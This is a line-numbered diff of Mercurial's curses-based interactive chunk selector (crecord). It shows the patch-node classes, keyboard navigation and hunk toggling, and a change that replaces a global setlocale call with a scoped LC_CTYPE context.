11 11 from __future__ import absolute_import
12 12
13 import locale
14 13 import os
15 14 import re
16 15 import signal
17 16
18 17 from .i18n import _
19 18 from .pycompat import (
20 19 getattr,
21 20 open,
22 21 )
23 22 from . import (
24 23 encoding,
25 24 error,
26 25 patch as patchmod,
27 26 pycompat,
28 27 scmutil,
29 28 util,
30 29 )
31 30 from .utils import stringutil
32 31
33 32 stringio = util.stringio
34 33
35 34 # patch comments based on the git one
36 35 diffhelptext = _(
37 36 """# To remove '-' lines, make them ' ' lines (context).
38 37 # To remove '+' lines, delete them.
39 38 # Lines starting with # will be removed from the patch.
40 39 """
41 40 )
42 41
43 42 hunkhelptext = _(
44 43 """#
45 44 # If the patch applies cleanly, the edited hunk will immediately be
46 45 # added to the record list. If it does not apply cleanly, a rejects file
47 46 # will be generated. You can use that when you try again. If all lines
48 47 # of the hunk are removed, then the edit is aborted and the hunk is left
49 48 # unchanged.
50 49 """
51 50 )
52 51
53 52 patchhelptext = _(
54 53 """#
55 54 # If the patch applies cleanly, the edited patch will immediately
56 55 # be finalised. If it does not apply cleanly, rejects files will be
57 56 # generated. You can use those when you try again.
58 57 """
59 58 )
60 59
61 60 try:
62 61 import curses
63 62 import curses.ascii
64 63
65 64 curses.error
66 65 except (ImportError, AttributeError):
67 66 # I have no idea if wcurses works with crecord...
68 67 try:
69 68 import wcurses as curses
70 69
71 70 curses.error
72 71 except (ImportError, AttributeError):
73 72 # wcurses is not shipped on Windows by default, or python is not
74 73 # compiled with curses
75 74 curses = False
76 75
77 76
78 77 class fallbackerror(error.Abort):
79 78 """Error that indicates the client should try to fallback to text mode."""
80 79
81 80 # Inherits from error.Abort so that existing behavior is preserved if the
82 81 # calling code does not know how to fallback.
83 82
84 83
85 84 def checkcurses(ui):
86 85 """Return True if the user wants to use curses
87 86
88 87 This method returns True if curses is found (and that python is built with
89 88 it) and that the user has the correct flag for the ui.
90 89 """
91 90 return curses and ui.interface(b"chunkselector") == b"curses"
92 91
93 92
94 93 class patchnode(object):
95 94 """abstract class for patch graph nodes
96 95 (i.e. patchroot, header, hunk, hunkline)
97 96 """
98 97
99 98 def firstchild(self):
100 99 raise NotImplementedError(b"method must be implemented by subclass")
101 100
102 101 def lastchild(self):
103 102 raise NotImplementedError(b"method must be implemented by subclass")
104 103
105 104 def allchildren(self):
106 105 """Return a list of all of the direct children of this node"""
107 106 raise NotImplementedError(b"method must be implemented by subclass")
108 107
109 108 def nextsibling(self):
110 109 """
111 110 Return the closest next item of the same type where there are no items
112 111 of different types between the current item and this closest item.
113 112 If no such item exists, return None.
114 113 """
115 114 raise NotImplementedError(b"method must be implemented by subclass")
116 115
117 116 def prevsibling(self):
118 117 """
119 118 Return the closest previous item of the same type where there are no
120 119 items of different types between the current item and this closest item.
121 120 If no such item exists, return None.
122 121 """
123 122 raise NotImplementedError(b"method must be implemented by subclass")
124 123
125 124 def parentitem(self):
126 125 raise NotImplementedError(b"method must be implemented by subclass")
127 126
128 127 def nextitem(self, skipfolded=True):
129 128 """
130 129 Try to return the next item closest to this item, regardless of item's
131 130 type (header, hunk, or hunkline).
132 131
133 132 If skipfolded == True, and the current item is folded, then the child
134 133 items that are hidden due to folding will be skipped when determining
135 134 the next item.
136 135
137 136 If it is not possible to get the next item, return None.
138 137 """
139 138 try:
140 139 itemfolded = self.folded
141 140 except AttributeError:
142 141 itemfolded = False
143 142 if skipfolded and itemfolded:
144 143 nextitem = self.nextsibling()
145 144 if nextitem is None:
146 145 try:
147 146 nextitem = self.parentitem().nextsibling()
148 147 except AttributeError:
149 148 nextitem = None
150 149 return nextitem
151 150 else:
152 151 # try child
153 152 item = self.firstchild()
154 153 if item is not None:
155 154 return item
156 155
157 156 # else try next sibling
158 157 item = self.nextsibling()
159 158 if item is not None:
160 159 return item
161 160
162 161 try:
163 162 # else try parent's next sibling
164 163 item = self.parentitem().nextsibling()
165 164 if item is not None:
166 165 return item
167 166
168 167 # else return grandparent's next sibling (or None)
169 168 return self.parentitem().parentitem().nextsibling()
170 169
171 170 except AttributeError: # parent and/or grandparent was None
172 171 return None
173 172
174 173 def previtem(self):
175 174 """
176 175 Try to return the previous item closest to this item, regardless of
177 176 item's type (header, hunk, or hunkline).
178 177
179 178 If it is not possible to get the previous item, return None.
180 179 """
181 180 # try previous sibling's last child's last child,
182 181 # else try previous sibling's last child, else try previous sibling
183 182 prevsibling = self.prevsibling()
184 183 if prevsibling is not None:
185 184 prevsiblinglastchild = prevsibling.lastchild()
186 185 if (prevsiblinglastchild is not None) and not prevsibling.folded:
187 186 prevsiblinglclc = prevsiblinglastchild.lastchild()
188 187 if (
189 188 prevsiblinglclc is not None
190 189 ) and not prevsiblinglastchild.folded:
191 190 return prevsiblinglclc
192 191 else:
193 192 return prevsiblinglastchild
194 193 else:
195 194 return prevsibling
196 195
197 196 # try parent (or None)
198 197 return self.parentitem()
199 198
200 199
201 200 class patch(patchnode, list): # todo: rename patchroot
202 201 """
203 202 list of header objects representing the patch.
204 203 """
205 204
206 205 def __init__(self, headerlist):
207 206 self.extend(headerlist)
208 207 # add parent patch object reference to each header
209 208 for header in self:
210 209 header.patch = self
211 210
212 211
213 212 class uiheader(patchnode):
214 213 """patch header
215 214
216 215 xxx shouldn't we move this to mercurial/patch.py ?
217 216 """
218 217
219 218 def __init__(self, header):
220 219 self.nonuiheader = header
221 220 # flag to indicate whether to apply this chunk
222 221 self.applied = True
223 222 # flag which only affects the status display indicating if a node's
224 223 # children are partially applied (i.e. some applied, some not).
225 224 self.partial = False
226 225
227 226 # flag to indicate whether to display as folded/unfolded to user
228 227 self.folded = True
229 228
230 229 # list of all headers in patch
231 230 self.patch = None
232 231
233 232 # flag is False if this header was ever unfolded from initial state
234 233 self.neverunfolded = True
235 234 self.hunks = [uihunk(h, self) for h in self.hunks]
236 235
237 236 def prettystr(self):
238 237 x = stringio()
239 238 self.pretty(x)
240 239 return x.getvalue()
241 240
242 241 def nextsibling(self):
243 242 numheadersinpatch = len(self.patch)
244 243 indexofthisheader = self.patch.index(self)
245 244
246 245 if indexofthisheader < numheadersinpatch - 1:
247 246 nextheader = self.patch[indexofthisheader + 1]
248 247 return nextheader
249 248 else:
250 249 return None
251 250
252 251 def prevsibling(self):
253 252 indexofthisheader = self.patch.index(self)
254 253 if indexofthisheader > 0:
255 254 previousheader = self.patch[indexofthisheader - 1]
256 255 return previousheader
257 256 else:
258 257 return None
259 258
260 259 def parentitem(self):
261 260 """
262 261 there is no 'real' parent item of a header that can be selected,
263 262 so return None.
264 263 """
265 264 return None
266 265
267 266 def firstchild(self):
268 267 """return the first child of this item, if one exists. otherwise
269 268 None."""
270 269 if len(self.hunks) > 0:
271 270 return self.hunks[0]
272 271 else:
273 272 return None
274 273
275 274 def lastchild(self):
276 275 """return the last child of this item, if one exists. otherwise
277 276 None."""
278 277 if len(self.hunks) > 0:
279 278 return self.hunks[-1]
280 279 else:
281 280 return None
282 281
283 282 def allchildren(self):
284 283 """return a list of all of the direct children of this node"""
285 284 return self.hunks
286 285
287 286 def __getattr__(self, name):
288 287 return getattr(self.nonuiheader, name)
289 288
290 289
291 290 class uihunkline(patchnode):
292 291 """represents a changed line in a hunk"""
293 292
294 293 def __init__(self, linetext, hunk):
295 294 self.linetext = linetext
296 295 self.applied = True
297 296 # the parent hunk to which this line belongs
298 297 self.hunk = hunk
299 298 # folding lines currently is not used/needed, but this flag is needed
300 299 # in the previtem method.
301 300 self.folded = False
302 301
303 302 def prettystr(self):
304 303 return self.linetext
305 304
306 305 def nextsibling(self):
307 306 numlinesinhunk = len(self.hunk.changedlines)
308 307 indexofthisline = self.hunk.changedlines.index(self)
309 308
310 309 if indexofthisline < numlinesinhunk - 1:
311 310 nextline = self.hunk.changedlines[indexofthisline + 1]
312 311 return nextline
313 312 else:
314 313 return None
315 314
316 315 def prevsibling(self):
317 316 indexofthisline = self.hunk.changedlines.index(self)
318 317 if indexofthisline > 0:
319 318 previousline = self.hunk.changedlines[indexofthisline - 1]
320 319 return previousline
321 320 else:
322 321 return None
323 322
324 323 def parentitem(self):
325 324 """return the parent to the current item"""
326 325 return self.hunk
327 326
328 327 def firstchild(self):
329 328 """return the first child of this item, if one exists. otherwise
330 329 None."""
331 330 # hunk-lines don't have children
332 331 return None
333 332
334 333 def lastchild(self):
335 334 """return the last child of this item, if one exists. otherwise
336 335 None."""
337 336 # hunk-lines don't have children
338 337 return None
339 338
340 339
341 340 class uihunk(patchnode):
342 341 """ui patch hunk, wraps a hunk and keep track of ui behavior """
343 342
344 343 maxcontext = 3
345 344
346 345 def __init__(self, hunk, header):
347 346 self._hunk = hunk
348 347 self.changedlines = [uihunkline(line, self) for line in hunk.hunk]
349 348 self.header = header
350 349 # used at end for detecting how many removed lines were un-applied
351 350 self.originalremoved = self.removed
352 351
353 352 # flag to indicate whether to display as folded/unfolded to user
354 353 self.folded = True
355 354 # flag to indicate whether to apply this chunk
356 355 self.applied = True
357 356 # flag which only affects the status display indicating if a node's
358 357 # children are partially applied (i.e. some applied, some not).
359 358 self.partial = False
360 359
361 360 def nextsibling(self):
362 361 numhunksinheader = len(self.header.hunks)
363 362 indexofthishunk = self.header.hunks.index(self)
364 363
365 364 if indexofthishunk < numhunksinheader - 1:
366 365 nexthunk = self.header.hunks[indexofthishunk + 1]
367 366 return nexthunk
368 367 else:
369 368 return None
370 369
371 370 def prevsibling(self):
372 371 indexofthishunk = self.header.hunks.index(self)
373 372 if indexofthishunk > 0:
374 373 previoushunk = self.header.hunks[indexofthishunk - 1]
375 374 return previoushunk
376 375 else:
377 376 return None
378 377
379 378 def parentitem(self):
380 379 """return the parent to the current item"""
381 380 return self.header
382 381
383 382 def firstchild(self):
384 383 """return the first child of this item, if one exists. otherwise
385 384 None."""
386 385 if len(self.changedlines) > 0:
387 386 return self.changedlines[0]
388 387 else:
389 388 return None
390 389
391 390 def lastchild(self):
392 391 """return the last child of this item, if one exists. otherwise
393 392 None."""
394 393 if len(self.changedlines) > 0:
395 394 return self.changedlines[-1]
396 395 else:
397 396 return None
398 397
399 398 def allchildren(self):
400 399 """return a list of all of the direct children of this node"""
401 400 return self.changedlines
402 401
403 402 def countchanges(self):
404 403 """changedlines -> (n+,n-)"""
405 404 add = len(
406 405 [
407 406 l
408 407 for l in self.changedlines
409 408 if l.applied and l.prettystr().startswith(b'+')
410 409 ]
411 410 )
412 411 rem = len(
413 412 [
414 413 l
415 414 for l in self.changedlines
416 415 if l.applied and l.prettystr().startswith(b'-')
417 416 ]
418 417 )
419 418 return add, rem
420 419
421 420 def getfromtoline(self):
422 421 # calculate the number of removed lines converted to context lines
423 422 removedconvertedtocontext = self.originalremoved - self.removed
424 423
425 424 contextlen = (
426 425 len(self.before) + len(self.after) + removedconvertedtocontext
427 426 )
428 427 if self.after and self.after[-1] == b'\\ No newline at end of file\n':
429 428 contextlen -= 1
430 429 fromlen = contextlen + self.removed
431 430 tolen = contextlen + self.added
432 431
433 432 # diffutils manual, section "2.2.2.2 detailed description of unified
434 433 # format": "an empty hunk is considered to end at the line that
435 434 # precedes the hunk."
436 435 #
437 436 # so, if either of hunks is empty, decrease its line start. --immerrr
438 437 # but only do this if fromline > 0, to avoid having, e.g fromline=-1.
439 438 fromline, toline = self.fromline, self.toline
440 439 if fromline != 0:
441 440 if fromlen == 0:
442 441 fromline -= 1
443 442 if tolen == 0 and toline > 0:
444 443 toline -= 1
445 444
446 445 fromtoline = b'@@ -%d,%d +%d,%d @@%s\n' % (
447 446 fromline,
448 447 fromlen,
449 448 toline,
450 449 tolen,
451 450 self.proc and (b' ' + self.proc),
452 451 )
453 452 return fromtoline
454 453
455 454 def write(self, fp):
456 455 # updated self.added/removed, which are used by getfromtoline()
457 456 self.added, self.removed = self.countchanges()
458 457 fp.write(self.getfromtoline())
459 458
460 459 hunklinelist = []
461 460 # add the following to the list: (1) all applied lines, and
462 461 # (2) all unapplied removal lines (convert these to context lines)
463 462 for changedline in self.changedlines:
464 463 changedlinestr = changedline.prettystr()
465 464 if changedline.applied:
466 465 hunklinelist.append(changedlinestr)
467 466 elif changedlinestr.startswith(b"-"):
468 467 hunklinelist.append(b" " + changedlinestr[1:])
469 468
470 469 fp.write(b''.join(self.before + hunklinelist + self.after))
471 470
472 471 pretty = write
473 472
474 473 def prettystr(self):
475 474 x = stringio()
476 475 self.pretty(x)
477 476 return x.getvalue()
478 477
479 478 def reversehunk(self):
480 479 """return a recordhunk which is the reverse of the hunk
481 480
482 481 Assuming the displayed patch is diff(A, B) result. The returned hunk is
483 482 intended to be applied to B, instead of A.
484 483
485 484 For example, when A is "0\n1\n2\n6\n" and B is "0\n3\n4\n5\n6\n", and
486 485 the user made the following selection:
487 486
488 487 0
489 488 [x] -1 [x]: selected
490 489 [ ] -2 [ ]: not selected
491 490 [x] +3
492 491 [ ] +4
493 492 [x] +5
494 493 6
495 494
496 495 This function returns a hunk like:
497 496
498 497 0
499 498 -3
500 499 -4
501 500 -5
502 501 +1
503 502 +4
504 503 6
505 504
506 505 Note "4" was first deleted then added. That's because "4" exists in B
507 506 side and "-4" must exist between "-3" and "-5" to make the patch
508 507 applicable to B.
509 508 """
510 509 dels = []
511 510 adds = []
512 511 for line in self.changedlines:
513 512 text = line.linetext
514 513 if line.applied:
515 514 if text.startswith(b'+'):
516 515 dels.append(text[1:])
517 516 elif text.startswith(b'-'):
518 517 adds.append(text[1:])
519 518 elif text.startswith(b'+'):
520 519 dels.append(text[1:])
521 520 adds.append(text[1:])
522 521 hunk = [b'-%s' % l for l in dels] + [b'+%s' % l for l in adds]
523 522 h = self._hunk
524 523 return patchmod.recordhunk(
525 524 h.header, h.toline, h.fromline, h.proc, h.before, hunk, h.after
526 525 )
527 526
528 527 def __getattr__(self, name):
529 528 return getattr(self._hunk, name)
530 529
531 530 def __repr__(self):
532 531 return '<hunk %r@%d>' % (self.filename(), self.fromline)
533 532
534 533
535 534 def filterpatch(ui, chunks, chunkselector, operation=None):
536 535 """interactively filter patch chunks into applied-only chunks"""
537 536 chunks = list(chunks)
538 537 # convert chunks list into structure suitable for displaying/modifying
539 538 # with curses. create a list of headers only.
540 539 headers = [c for c in chunks if isinstance(c, patchmod.header)]
541 540
542 541 # if there are no changed files
543 542 if len(headers) == 0:
544 543 return [], {}
545 544 uiheaders = [uiheader(h) for h in headers]
546 545 # let user choose headers/hunks/lines, and mark their applied flags
547 546 # accordingly
548 547 ret = chunkselector(ui, uiheaders, operation=operation)
549 548 appliedhunklist = []
550 549 for hdr in uiheaders:
551 550 if hdr.applied and (
552 551 hdr.special() or len([h for h in hdr.hunks if h.applied]) > 0
553 552 ):
554 553 appliedhunklist.append(hdr)
555 554 fixoffset = 0
556 555 for hnk in hdr.hunks:
557 556 if hnk.applied:
558 557 appliedhunklist.append(hnk)
559 558 # adjust the 'to'-line offset of the hunk to be correct
560 559 # after de-activating some of the other hunks for this file
561 560 if fixoffset:
562 561 # hnk = copy.copy(hnk) # necessary??
563 562 hnk.toline += fixoffset
564 563 else:
565 564 fixoffset += hnk.removed - hnk.added
566 565
567 566 return (appliedhunklist, ret)
568 567
569 568
570 569 def chunkselector(ui, headerlist, operation=None):
571 570 """
572 571 curses interface to get selection of chunks, and mark the applied flags
573 572 of the chosen chunks.
574 573 """
575 574 ui.write(_(b'starting interactive selection\n'))
576 575 chunkselector = curseschunkselector(headerlist, ui, operation)
577 # This is required for ncurses to display non-ASCII characters in
578 # default user locale encoding correctly. --immerrr
579 locale.setlocale(locale.LC_ALL, '')
580 576 origsigtstp = sentinel = object()
581 577 if util.safehasattr(signal, b'SIGTSTP'):
582 578 origsigtstp = signal.getsignal(signal.SIGTSTP)
583 579 try:
584 curses.wrapper(chunkselector.main)
580 with util.with_lc_ctype():
581 curses.wrapper(chunkselector.main)
585 582 if chunkselector.initexc is not None:
586 583 raise chunkselector.initexc
587 584 # ncurses does not restore signal handler for SIGTSTP
588 585 finally:
589 586 if origsigtstp is not sentinel:
590 587 signal.signal(signal.SIGTSTP, origsigtstp)
591 588 return chunkselector.opts
592 589
593 590
594 591 def testdecorator(testfn, f):
595 592 def u(*args, **kwargs):
596 593 return f(testfn, *args, **kwargs)
597 594
598 595 return u
599 596
600 597
601 598 def testchunkselector(testfn, ui, headerlist, operation=None):
602 599 """
603 600 test interface to get selection of chunks, and mark the applied flags
604 601 of the chosen chunks.
605 602 """
606 603 chunkselector = curseschunkselector(headerlist, ui, operation)
607 604
608 605 class dummystdscr(object):
609 606 def clear(self):
610 607 pass
611 608
612 609 def refresh(self):
613 610 pass
614 611
615 612 chunkselector.stdscr = dummystdscr()
616 613 if testfn and os.path.exists(testfn):
617 614 testf = open(testfn, 'r')
618 615 testcommands = [x.rstrip('\n') for x in testf.readlines()]
619 616 testf.close()
620 617 while True:
621 618 if chunkselector.handlekeypressed(testcommands.pop(0), test=True):
622 619 break
623 620 return chunkselector.opts
624 621
625 622
626 623 _headermessages = { # {operation: text}
627 624 b'apply': _(b'Select hunks to apply'),
628 625 b'discard': _(b'Select hunks to discard'),
629 626 b'keep': _(b'Select hunks to keep'),
630 627 None: _(b'Select hunks to record'),
631 628 }
632 629
633 630
634 631 class curseschunkselector(object):
635 632 def __init__(self, headerlist, ui, operation=None):
636 633 # put the headers into a patch object
637 634 self.headerlist = patch(headerlist)
638 635
639 636 self.ui = ui
640 637 self.opts = {}
641 638
642 639 self.errorstr = None
643 640 # list of all chunks
644 641 self.chunklist = []
645 642 for h in headerlist:
646 643 self.chunklist.append(h)
647 644 self.chunklist.extend(h.hunks)
648 645
649 646 # dictionary mapping (fgcolor, bgcolor) pairs to the
650 647 # corresponding curses color-pair value.
651 648 self.colorpairs = {}
652 649 # maps custom nicknames of color-pairs to curses color-pair values
653 650 self.colorpairnames = {}
654 651
655 652 # Honor color setting of ui section. Keep colored setup as
656 653 # long as not explicitly set to a falsy value - especially,
657 654 # when not set at all. This is to stay most compatible with
658 655 # previous (color only) behaviour.
659 656 uicolor = stringutil.parsebool(self.ui.config(b'ui', b'color'))
660 657 self.usecolor = uicolor is not False
661 658
662 659 # the currently selected header, hunk, or hunk-line
663 660 self.currentselecteditem = self.headerlist[0]
664 661 self.lastapplieditem = None
665 662
666 663 # updated when printing out patch-display -- the 'lines' here are the
667 664 # line positions *in the pad*, not on the screen.
668 665 self.selecteditemstartline = 0
669 666 self.selecteditemendline = None
670 667
671 668 # define indentation levels
672 669 self.headerindentnumchars = 0
673 670 self.hunkindentnumchars = 3
674 671 self.hunklineindentnumchars = 6
675 672
676 673 # the first line of the pad to print to the screen
677 674 self.firstlineofpadtoprint = 0
678 675
679 676 # keeps track of the number of lines in the pad
680 677 self.numpadlines = None
681 678
682 679 self.numstatuslines = 1
683 680
684 681 # keep a running count of the number of lines printed to the pad
685 682 # (used for determining when the selected item begins/ends)
686 683 self.linesprintedtopadsofar = 0
687 684
688 685 # stores optional text for a commit comment provided by the user
689 686 self.commenttext = b""
690 687
691 688 # if the last 'toggle all' command caused all changes to be applied
692 689 self.waslasttoggleallapplied = True
693 690
694 691 # affects some ui text
695 692 if operation not in _headermessages:
696 693 raise error.ProgrammingError(
697 694 b'unexpected operation: %s' % operation
698 695 )
699 696 self.operation = operation
700 697
701 698 def uparrowevent(self):
702 699 """
703 700 try to select the previous item to the current item that has the
704 701 most-indented level. for example, if a hunk is selected, try to select
705 702 the last hunkline of the hunk prior to the selected hunk. or, if
706 703 the first hunkline of a hunk is currently selected, then select the
707 704 hunk itself.
708 705 """
709 706 currentitem = self.currentselecteditem
710 707
711 708 nextitem = currentitem.previtem()
712 709
713 710 if nextitem is None:
714 711 # if no parent item (i.e. currentitem is the first header), then
715 712 # no change...
716 713 nextitem = currentitem
717 714
718 715 self.currentselecteditem = nextitem
719 716
720 717 def uparrowshiftevent(self):
721 718 """
722 719 select (if possible) the previous item on the same level as the
723 720 currently selected item. otherwise, select (if possible) the
724 721 parent-item of the currently selected item.
725 722 """
726 723 currentitem = self.currentselecteditem
727 724 nextitem = currentitem.prevsibling()
728 725 # if there's no previous sibling, try choosing the parent
729 726 if nextitem is None:
730 727 nextitem = currentitem.parentitem()
731 728 if nextitem is None:
732 729 # if no parent item (i.e. currentitem is the first header), then
733 730 # no change...
734 731 nextitem = currentitem
735 732
736 733 self.currentselecteditem = nextitem
737 734 self.recenterdisplayedarea()
738 735
739 736 def downarrowevent(self):
740 737 """
741 738 try to select the next item to the current item that has the
742 739 most-indented level. for example, if a hunk is selected, select
743 740 the first hunkline of the selected hunk. or, if the last hunkline of
744 741 a hunk is currently selected, then select the next hunk, if one exists,
745 742 or if not, the next header if one exists.
746 743 """
747 744 # self.startprintline += 1 #debug
748 745 currentitem = self.currentselecteditem
749 746
750 747 nextitem = currentitem.nextitem()
751 748 # if there's no next item, keep the selection as-is
752 749 if nextitem is None:
753 750 nextitem = currentitem
754 751
755 752 self.currentselecteditem = nextitem
756 753
757 754 def downarrowshiftevent(self):
758 755 """
759 756 select (if possible) the next item on the same level as the currently
760 757 selected item. otherwise, select (if possible) the next item on the
761 758 same level as the parent item of the currently selected item.
762 759 """
763 760 currentitem = self.currentselecteditem
764 761 nextitem = currentitem.nextsibling()
765 762 # if there's no next sibling, try choosing the parent's nextsibling
766 763 if nextitem is None:
767 764 try:
768 765 nextitem = currentitem.parentitem().nextsibling()
769 766 except AttributeError:
770 767 # parentitem returned None, so nextsibling() can't be called
771 768 nextitem = None
772 769 if nextitem is None:
773 770 # if parent has no next sibling, then no change...
774 771 nextitem = currentitem
775 772
776 773 self.currentselecteditem = nextitem
777 774 self.recenterdisplayedarea()
778 775
779 776 def nextsametype(self, test=False):
780 777 currentitem = self.currentselecteditem
781 778 sametype = lambda item: isinstance(item, type(currentitem))
782 779 nextitem = currentitem.nextitem()
783 780
784 781 while nextitem is not None and not sametype(nextitem):
785 782 nextitem = nextitem.nextitem()
786 783
787 784 if nextitem is None:
788 785 nextitem = currentitem
789 786 else:
790 787 parent = nextitem.parentitem()
791 788 if parent is not None and parent.folded:
792 789 self.togglefolded(parent)
793 790
794 791 self.currentselecteditem = nextitem
795 792 if not test:
796 793 self.recenterdisplayedarea()
797 794
798 795 def rightarrowevent(self):
799 796 """
800 797 select (if possible) the first of this item's child-items.
801 798 """
802 799 currentitem = self.currentselecteditem
803 800 nextitem = currentitem.firstchild()
804 801
805 802 # turn off folding if we want to show a child-item
806 803 if currentitem.folded:
807 804 self.togglefolded(currentitem)
808 805
809 806 if nextitem is None:
810 807 # if no next item on parent-level, then no change...
811 808 nextitem = currentitem
812 809
813 810 self.currentselecteditem = nextitem
814 811
815 812 def leftarrowevent(self):
816 813 """
817 814 if the current item can be folded (i.e. it is an unfolded header or
818 815 hunk), then fold it. otherwise try select (if possible) the parent
819 816 of this item.
820 817 """
821 818 currentitem = self.currentselecteditem
822 819
823 820 # try to fold the item
824 821 if not isinstance(currentitem, uihunkline):
825 822 if not currentitem.folded:
826 823 self.togglefolded(item=currentitem)
827 824 return
828 825
829 826 # if it can't be folded, try to select the parent item
830 827 nextitem = currentitem.parentitem()
831 828
832 829 if nextitem is None:
833 830 # if no item on parent-level, then no change...
834 831 nextitem = currentitem
835 832 if not nextitem.folded:
836 833 self.togglefolded(item=nextitem)
837 834
838 835 self.currentselecteditem = nextitem
839 836
840 837 def leftarrowshiftevent(self):
841 838 """
842 839 select the header of the current item (or fold current item if the
843 840 current item is already a header).
844 841 """
845 842 currentitem = self.currentselecteditem
846 843
847 844 if isinstance(currentitem, uiheader):
848 845 if not currentitem.folded:
849 846 self.togglefolded(item=currentitem)
850 847 return
851 848
852 849 # select the parent item recursively until we're at a header
853 850 while True:
854 851 nextitem = currentitem.parentitem()
855 852 if nextitem is None:
856 853 break
857 854 else:
858 855 currentitem = nextitem
859 856
860 857 self.currentselecteditem = currentitem
861 858
862 859 def updatescroll(self):
863 860 """scroll the screen to fully show the currently-selected"""
864 861 selstart = self.selecteditemstartline
865 862 selend = self.selecteditemendline
866 863
867 864 padstart = self.firstlineofpadtoprint
868 865 padend = padstart + self.yscreensize - self.numstatuslines - 1
869 866 # 'buffered' pad start/end values which scroll with a certain
870 867 # top/bottom context margin
871 868 padstartbuffered = padstart + 3
872 869 padendbuffered = padend - 3
873 870
874 871 if selend > padendbuffered:
875 872 self.scrolllines(selend - padendbuffered)
876 873 elif selstart < padstartbuffered:
877 874 # negative values scroll in pgup direction
878 875 self.scrolllines(selstart - padstartbuffered)
879 876
880 877 def scrolllines(self, numlines):
881 878 """scroll the screen up (down) by numlines when numlines >0 (<0)."""
882 879 self.firstlineofpadtoprint += numlines
883 880 if self.firstlineofpadtoprint < 0:
884 881 self.firstlineofpadtoprint = 0
885 882 if self.firstlineofpadtoprint > self.numpadlines - 1:
886 883 self.firstlineofpadtoprint = self.numpadlines - 1
887 884
888 885 def toggleapply(self, item=None):
889 886 """
890 887 toggle the applied flag of the specified item. if no item is specified,
891 888 toggle the flag of the currently selected item.
892 889 """
893 890 if item is None:
894 891 item = self.currentselecteditem
895 892 # Only set this when NOT using 'toggleall'
896 893 self.lastapplieditem = item
897 894
898 895 item.applied = not item.applied
899 896
900 897 if isinstance(item, uiheader):
901 898 item.partial = False
902 899 if item.applied:
903 900 # apply all its hunks
904 901 for hnk in item.hunks:
905 902 hnk.applied = True
906 903 # apply all their hunklines
907 904 for hunkline in hnk.changedlines:
908 905 hunkline.applied = True
909 906 else:
910 907 # un-apply all its hunks
911 908 for hnk in item.hunks:
912 909 hnk.applied = False
913 910 hnk.partial = False
914 911 # un-apply all their hunklines
915 912 for hunkline in hnk.changedlines:
916 913 hunkline.applied = False
917 914 elif isinstance(item, uihunk):
918 915 item.partial = False
919 916 # apply all it's hunklines
920 917 for hunkline in item.changedlines:
921 918 hunkline.applied = item.applied
922 919
923 920 siblingappliedstatus = [hnk.applied for hnk in item.header.hunks]
924 921 allsiblingsapplied = not (False in siblingappliedstatus)
925 922 nosiblingsapplied = not (True in siblingappliedstatus)
926 923
927 924 siblingspartialstatus = [hnk.partial for hnk in item.header.hunks]
928 925 somesiblingspartial = True in siblingspartialstatus
929 926
930 927 # cases where applied or partial should be removed from header
931 928
932 929 # if no 'sibling' hunks are applied (including this hunk)
933 930 if nosiblingsapplied:
934 931 if not item.header.special():
935 932 item.header.applied = False
936 933 item.header.partial = False
937 934 else: # some/all parent siblings are applied
938 935 item.header.applied = True
939 936 item.header.partial = (
940 937 somesiblingspartial or not allsiblingsapplied
941 938 )
942 939
943 940 elif isinstance(item, uihunkline):
944 941 siblingappliedstatus = [ln.applied for ln in item.hunk.changedlines]
945 942 allsiblingsapplied = not (False in siblingappliedstatus)
946 943 nosiblingsapplied = not (True in siblingappliedstatus)
947 944
948 945 # if no 'sibling' lines are applied
949 946 if nosiblingsapplied:
950 947 item.hunk.applied = False
951 948 item.hunk.partial = False
952 949 elif allsiblingsapplied:
953 950 item.hunk.applied = True
954 951 item.hunk.partial = False
955 952 else: # some siblings applied
956 953 item.hunk.applied = True
957 954 item.hunk.partial = True
958 955
959 956 parentsiblingsapplied = [
960 957 hnk.applied for hnk in item.hunk.header.hunks
961 958 ]
962 959 noparentsiblingsapplied = not (True in parentsiblingsapplied)
963 960 allparentsiblingsapplied = not (False in parentsiblingsapplied)
964 961
965 962 parentsiblingspartial = [
966 963 hnk.partial for hnk in item.hunk.header.hunks
967 964 ]
968 965 someparentsiblingspartial = True in parentsiblingspartial
969 966
970 967 # if all parent hunks are not applied, un-apply header
971 968 if noparentsiblingsapplied:
972 969 if not item.hunk.header.special():
973 970 item.hunk.header.applied = False
974 971 item.hunk.header.partial = False
975 972 # set the applied and partial status of the header if needed
976 973 else: # some/all parent siblings are applied
977 974 item.hunk.header.applied = True
978 975 item.hunk.header.partial = (
979 976 someparentsiblingspartial or not allparentsiblingsapplied
980 977 )
981 978
982 979 def toggleall(self):
983 980 """toggle the applied flag of all items."""
984 981 if self.waslasttoggleallapplied: # then unapply them this time
985 982 for item in self.headerlist:
986 983 if item.applied:
987 984 self.toggleapply(item)
988 985 else:
989 986 for item in self.headerlist:
990 987 if not item.applied:
991 988 self.toggleapply(item)
992 989 self.waslasttoggleallapplied = not self.waslasttoggleallapplied
993 990
994 991 def flipselections(self):
995 992 """
996 993 Flip all selections. Every selected line is unselected and vice
997 994 versa.
998 995 """
999 996 for header in self.headerlist:
1000 997 for hunk in header.allchildren():
1001 998 for line in hunk.allchildren():
1002 999 self.toggleapply(line)
1003 1000
1004 1001 def toggleallbetween(self):
1005 1002 """toggle applied on or off for all items in range [lastapplied,
1006 1003 current]. """
1007 1004 if (
1008 1005 not self.lastapplieditem
1009 1006 or self.currentselecteditem == self.lastapplieditem
1010 1007 ):
1011 1008 # Treat this like a normal 'x'/' '
1012 1009 self.toggleapply()
1013 1010 return
1014 1011
1015 1012 startitem = self.lastapplieditem
1016 1013 enditem = self.currentselecteditem
1017 1014 # Verify that enditem is "after" startitem, otherwise swap them.
1018 1015 for direction in [b'forward', b'reverse']:
1019 1016 nextitem = startitem.nextitem()
1020 1017 while nextitem and nextitem != enditem:
1021 1018 nextitem = nextitem.nextitem()
1022 1019 if nextitem:
1023 1020 break
1024 1021 # Looks like we went the wrong direction :)
1025 1022 startitem, enditem = enditem, startitem
1026 1023
1027 1024 if not nextitem:
1028 1025 # We didn't find a path going either forward or backward? Don't know
1029 1026 # how this can happen, let's not crash though.
1030 1027 return
1031 1028
1032 1029 nextitem = startitem
1033 1030 # Switch all items to be the opposite state of the currently selected
1034 1031 # item. Specifically:
1035 1032 # [ ] startitem
1036 1033 # [x] middleitem
1037 1034 # [ ] enditem <-- currently selected
1038 1035 # This will turn all three on, since the currently selected item is off.
1039 1036 # This does *not* invert each item (i.e. middleitem stays marked/on)
1040 1037 desiredstate = not self.currentselecteditem.applied
